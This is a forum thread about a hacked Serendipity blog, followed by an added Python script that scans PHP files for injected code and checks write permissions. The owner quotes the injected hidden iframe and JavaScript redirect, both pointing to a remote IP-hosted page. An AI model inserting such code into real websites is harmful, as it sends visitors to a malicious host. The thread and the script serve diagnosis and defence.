Hi,
When I had a look at my CoWriters Testblog, I noticed that it was hacked. I don't know the reason why.
If you want to have a look at my hacked blog:
http://www.bibi-rolli.de/blog101/
Can anybody help me? The database seems to be clear ...
Best wishes,
Rolli
Blog hacked
Could Be Anything...
You are running quite a lot of other applications...
Like a TRIAL version of Invision Power Board...
Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee
In the morning I had a further look and you are right, this is the code:
<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>
But I think it must be a problem of the blog; my second test blog with another (different) user is also hacked in the same way. The rest of my server is pretty well ....
<script LANGUAGE="JavaScript">
setTimeout("window.location='http://217.13.198.251/avs/newdir1/stoorm.html'",15000);
// delai d'attente en ms (wait delay in ms)
</script>
<?php # $Id: index.php,v 1.77 2005/03/02 09:58:33 garvinhicking Exp $
The thing is this: The attacker cannot have inserted the code if he didn't have file access to index.php.
Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver), then it means your FTP account got hacked.
There would be no way for Serendipity to overwrite the index.php from only within the application.
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
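The permission check suggested above, as an added example that is not part of the original posts or of Serendipity's code: it flags PHP files carrying the kind of iframe or redirect injection quoted in the thread and reports whether the webserver account could have modified each one. The function names are hypothetical, and the webserver's uid and gids are assumed to be supplied by the operator (for example from `id nobody`).

```python
import os
import re
import stat
import sys

# Markers modelled on the two injections quoted in the thread: an <iframe>
# with a remote src, and a script redirect via window.location.
INJECTION = re.compile(
    rb"<iframe\b[^>]*\bsrc\s*=\s*[\"']?https?://"
    rb"|window\.location\s*=\s*[\"']https?://",
    re.IGNORECASE)

def writable_by(st, uid, gids):
    """True if the mode bits in st grant write access to the account (uid, gids)."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def triage(docroot, web_uid, web_gids):
    """Yield (path, injected, web_can_modify) for every .php file under docroot."""
    for root, _dirs, files in os.walk(docroot):
        # A writable directory lets the account replace a file it cannot write.
        dir_w = writable_by(os.stat(root), web_uid, web_gids)
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                injected = bool(INJECTION.search(fh.read()))
            file_w = writable_by(os.stat(path), web_uid, web_gids)
            yield path, injected, file_w or dir_w

def verdict(injected, web_can_modify):
    if not injected:
        return "clean"
    if web_can_modify:
        return "injected; webserver account could write it (check the applications)"
    return "injected; not writable by the webserver (check FTP/shell credentials)"

if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: triage.py DOCROOT WEB_UID WEB_GID[,WEB_GID...]")
    gids = {int(g) for g in sys.argv[3].split(",")}
    for path, inj, w in triage(sys.argv[1], int(sys.argv[2]), gids):
        print(f"{path}: {verdict(inj, w)}")
```

The result reflects the permissions as they are now; file modification times and the FTP and webserver logs are still needed to confirm which channel was used.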